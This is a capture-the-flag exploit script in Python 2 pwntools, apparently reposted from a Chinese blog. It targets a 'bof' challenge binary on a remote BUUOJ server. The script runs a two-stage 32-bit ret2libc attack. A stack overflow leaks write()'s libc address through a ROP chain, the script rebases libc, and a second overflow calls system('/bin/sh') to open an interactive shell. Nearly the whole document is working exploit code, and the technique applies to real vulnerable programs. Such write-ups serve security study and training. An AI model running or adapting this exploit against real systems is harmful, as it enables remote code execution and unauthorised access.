exp 脚本
栈溢出 ROP 泄露 libc 地址，再次栈溢出 ROP 执行 system('/bin/sh') 拿 shell。
# Two-stage ret2libc exploit script for the "bof" challenge binary (pwntools).
# Python 2 syntax throughout (`print hex(...)`, `.next()`, str payloads), so it
# runs under Python 2 / an older pwntools; it is not Python 3 compatible as written.
from pwn import *
context.log_level = 'debug'  # log every send/recv so the leak can be inspected
sh = remote('node3.buuoj.cn',26961)  # challenge service (host/port as given on the page)
elf = ELF('bof')                     # target binary: supplies plt/got/symbol addresses
libc = ELF('libc-2.23x86.so')        # libc build matching the remote, used for symbol offsets

# Stage 1: overflow and build a 32-bit ROP chain that calls write(1, &got['write'], 4)
# and then returns into main() so the program can be overflowed a second time.
# The 112-byte pad is the distance from the buffer to the saved return address
# (value comes from the author's analysis; not derivable from this listing).
# Layout after the pad follows the 32-bit cdecl convention:
#   [ret -> write@plt][ret after write -> main][fd=1][buf=GOT(write)][len=4]
# NOTE(review): reusing fixed elf.plt / elf.symbols addresses only works if the
# binary is not PIE — the script assumes this; confirm with checksec.
payload = 112 * 'a'
payload += p32(elf.plt['write'])
payload += p32(elf.symbols['main'])
payload += p32(1)
payload += p32(elf.got['write'])
payload += p32(4)
sh.sendline(payload)
# The 4 leaked bytes are write()'s runtime libc address (little-endian). The
# script assumes the high byte is 0xf7 and uses it as the delimiter; if the
# remote libc is mapped elsewhere this recv would block or mis-slice.
write_addr = u32(sh.recvuntil('\xf7')[-4:])
print hex(write_addr)
# Rebase: runtime libc base = leaked write - write's offset in the provided libc.
# This leak step is what defeats ASLR; the offsets are only valid for
# 'libc-2.23x86.so', so a different libc build on the remote would break both gadgets.
libcbase = write_addr - libc.symbols['write']
system = libcbase + libc.symbols['system']
binsh = libcbase + libc.search('/bin/sh').next()  # first occurrence of "/bin/sh" in libc

# Stage 2 (main has restarted): same overflow, chain = system("/bin/sh").
#   [ret -> system][fake return addr 0xdeadbeef][arg0 -> "/bin/sh"]
# The fake return address is never used cleanly; the process crashes only after
# the shell exits.
payload = 112 * 'a'
payload += p32(system)
payload += p32(0xdeadbeef)
payload += p32(binsh)
sh.sendline(payload)
sh.interactive()  # hand the connected shell over to the user
来源:oschina
链接:https://my.oschina.net/u/4267017/blog/4266945